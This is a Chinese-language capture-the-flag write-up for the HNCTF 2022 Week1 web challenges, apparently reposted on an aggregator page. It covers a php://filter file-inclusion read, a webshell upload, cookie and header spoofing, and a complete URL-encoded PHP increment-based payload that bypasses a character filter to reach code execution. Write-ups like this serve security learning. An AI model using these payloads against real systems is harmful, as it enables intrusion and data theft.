当前位置: 首页 > news >正文

[HNCTF 2022 Week1]——Web方向 详细Writeup

Week1

[HNCTF 2022 Week1]2048

f12查看源代码

image-20230706180920528

可以看出游戏的分数是score

image-20230706181314548

修改score的值

image-20230706181335493

得到flag

[HNCTF 2022 Week1]Interesting_include

得到源码

<?php
//WEB手要懂得搜索
//flag in ./flag.phpif(isset($_GET['filter'])){$file = $_GET['filter'];if(!preg_match("/flag/i", $file)){die("error");}include($file);
}else{highlight_file(__FILE__);
} 

php伪协议,构造payload:

http://node3.anna.nssctf.cn:28894/?filter=php://filter/read=convert.base64-encode/resource=flag.php

base64解码得到flag

[HNCTF 2022 Week1]easy_upload

不是,你个标签整这么吓人干嘛啊???是谁!!

image-20230707171703762

一句话木马直接挂马成功了

image-20230707175040356

蚁剑直接连接

image-20230707175126198

根目录下得到flag

[HNCTF 2022 Week1]easy_html

说饼干中好像有什么东西,那就看cookie,url转码一下,./f14g.php,然后去访问

image-20230707175428595

说要输入手机号登录,本来想随便输入一个的,但是只能输入十位,并且会回显nononono!

image-20230707183952827

利用burp抓包,强行输入11位数字,发包得到flag

image-20230707184059624

[HNCTF 2022 Week1]What is Web

CTRL+U往下拉

image-20230707190548543

base64解码得到flag

[HNCTF 2022 Week1]Interesting_http

说要post a want,那就给他发一个want

image-20230707191323402

给了两个单词,肯定选flag,然后发包

image-20230707191434589

提示Not admin,用burp抓包,可以看到cookie中有一个user,值是notadmin改成admin

image-20230707191950964

提示No location,用XFF

image-20230707192212380

拿到flag

[HNCTF 2022 Week1]Challenge__rce

f12查看hint,?hint

image-20230707195557715

给hint传入一个值得到源码

<?php
error_reporting(0);
if (isset($_GET['hint'])) {highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {$rce = $_POST['rce'];if (strlen($rce) <= 120) {if (is_string($rce)) {if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {eval($rce);} else {echo("Are you hack me?");}} else {echo "I want string!";}} else {echo "too long!";}
} 

说明这里要进行RCE,但是过滤掉了大部分东西,这里可以用的是$()+,.0123456789;=[]_{},那么就是自增RCE

关于自增RCE可看这篇:CTFshow-RCE极限大挑战wp

直接放payload:

rce=$_=[]._;$__=$_[1];$_=$_[0];$_++;$_1=++$_;$_++;$_++;$_++;$_++;$_=$_1.++$_.$__;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);

但是传入的时候要进行url编码

%24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B

并且传入的时候要传入12,如下

image-20230707200731013

然后将2的值为cat /ffflllaaaggg

得到flag

http://www.lryc.cn/news/164643.html

相关文章:

  • 3dmax vray如何创建真实的灯光?3dmax vray 室内照明教程
  • 如何在本地使用Docker搭建和运行Kubernetes集群
  • 每天几道Java面试题(第二天)
  • Java | 线程的生命周期和安全
  • Bootstrap的一些主要作用
  • 网络编程套接字 | UDP套接字
  • 网络层IP协议
  • C++ Day4
  • 2024字节跳动校招面试真题汇总及其解答(二)
  • SpringBoot集成websocket(4)|(使用okhttp3实现websocket)
  • 【MySQL】JDBC编程
  • 数据结构——二叉树线索化遍历(前中后序遍历)
  • GO语言网络编程(并发编程)Channel
  • c++day3
  • 算法通过村第六关-树青铜笔记|中序后序
  • C++动态内存管理+模板
  • SQL 注入漏洞攻击
  • 一篇五分生信临床模型预测文章代码复现——Figure 10.机制及肿瘤免疫浸润(四)
  • Transformer 模型中常见的特殊符号
  • C# halcon SubImage的使用
  • 每天几道Java面试题:异常机制(第三天)
  • Linux 中的 chattr 命令及示例
  • LeetCode 2605. Form Smallest Number From Two Digit Arrays【数组,哈希表,枚举;位运算】1241
  • VoxWeekly|The Sandbox 生态周报|20230904
  • antd setFieldsValue 设置初始值无效AutoComplete 设置默认值失败
  • 01-Redis核心数据结构与高性能原理
  • 预防Dos攻击
  • ant design的文档真的是一坨屎
  • 关于迁移学习的一点理解
  • 【力扣周赛】第 361 场周赛(⭐前缀和+哈希表 树上倍增、LCA⭐)